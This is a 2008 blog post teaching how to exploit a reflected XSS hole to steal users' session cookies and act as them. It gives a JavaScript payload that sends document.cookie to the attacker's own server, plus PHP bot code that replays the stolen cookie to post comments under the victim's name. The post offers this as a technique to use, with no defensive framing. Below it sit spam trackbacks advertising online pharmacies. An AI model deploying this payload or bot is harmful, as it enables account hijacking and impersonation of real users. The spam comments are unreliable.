Feeding cookies to a bot

Published on August 14th, 2008

You’ve probably heard of XSS. The javascript injection which will steal your cookie, bypassing the cross-domain policy implemented by browsers. Normally, you are not allowed to see the cookie of another site/control a user on another site.

However, if a site has XSS leaks, this does become possible. All you need is a way to inject javascript (clientscript) code onto the page. It does not even have to be saved on the site itself, simply an unfiltered echo $_GET['whatever']; will do.

Once you find this, you can steal the cookie and use it to act like the user. There are 2 options: either you use the cookie with a bot you wrote, or you mimic the user actions with javascript/ajax, since you can access javascript on the other site.

I’ll talk about sending the cookie to your bot, which will for example post a comment on a popular social network.

Let’s say the XSS hole you found is : http://www.othersite.com/input.php?txt=[whatever]
All you do is inject this piece of javascript code to attach the script to the current page:

var ss = document.createElement(’script’); ss.src = ‘http://www.mysite.com/cookiejar.php?cookie=’ + document.cookie; ss.type = ‘text/javascript’; document.getElementsByTagName(’head’)[0].appendChild(ss);

This will send the cookie to cookiejar.php where we will catch the cookie and feed it to our bot.

  1. function post($cookie) {
  2.  
  3. $fp = fsockopen("othersite.com", 80, $errno, $errstr, 30);
  4. if (!$fp) {
  5. echo "$errstr ($errno)<br />\n";
  6. } else {
  7. $salida = "POST /comment.php HTTP/1.1\r\n";
  8. $salida.="Host: othersite.com\r\n";
  9. $salida.="Cookie: " . $cookie . "\r\n";
  10. $salida.="Connection: close\r\n\r\n";
  11.  
  12. fwrite($fp, $salida);
  13. while (!feof($fp)) {
  14. $d = fgets($fp);
  15.  
  16. }//end while
  17. }//end else
  18. fclose($fp);
  19. }

Now the bot will send a comment under the user’s name. Ofcourse, this will use the same IP address for all the users you stole their cookie from. If you want to avoid this, mimic the behaviour in ajax.


There Are 4 Responses So Far. »

  1. Trackback by Webmaster on Thursday June 10th, 2010:

    Please e-mail me your contacts. I have a question webmaster@spottovo.ru” rel=”nofollow”>……

    Thank you!!!…

  2. Trackback by ROSS on Sunday July 04th, 2010:


    Pillspot.org. Canadian Health&Care.Special Internet Prices.No prescription online pharmacy.Best quality drugs. Low price drugs. Order drugs online

    Buy:Petcam (Metacam) Oral Suspension.Zovirax.Mega Hoodia.Synthroid.Actos.Human Growth Hormone.Nexium.Valtrex.Lumigan.100% Pure Okinawan Coral Calcium.Accutane.Prednisolone.Prevacid.Arimidex.Retin-A.Zyban….

  3. Trackback by OLIVER on Wednesday July 21st, 2010:


    Medicamentspot.com. Canadian Health&Care.Special Internet Prices.No prescription online pharmacy.Best quality drugs. Low price pills. Buy drugs online

    Buy:Viagra Professional.Cialis Soft Tabs.Cialis Super Active+.VPXL.Viagra.Cialis Professional.Propecia.Levitra.Tramadol.Viagra Super Force.Super Active ED Pack.Viagra Soft Tabs.Maxaman.Zithromax.Soma.Viagra Super Active+.Cialis….

  4. Trackback by pionite on Monday August 30th, 2010:

    Table http://cwebermgt8nb.02JEEPPARTS.US/tag/pionite+Kitchen+Table/ : Kitchen…

    Kitchen…

Post a Comment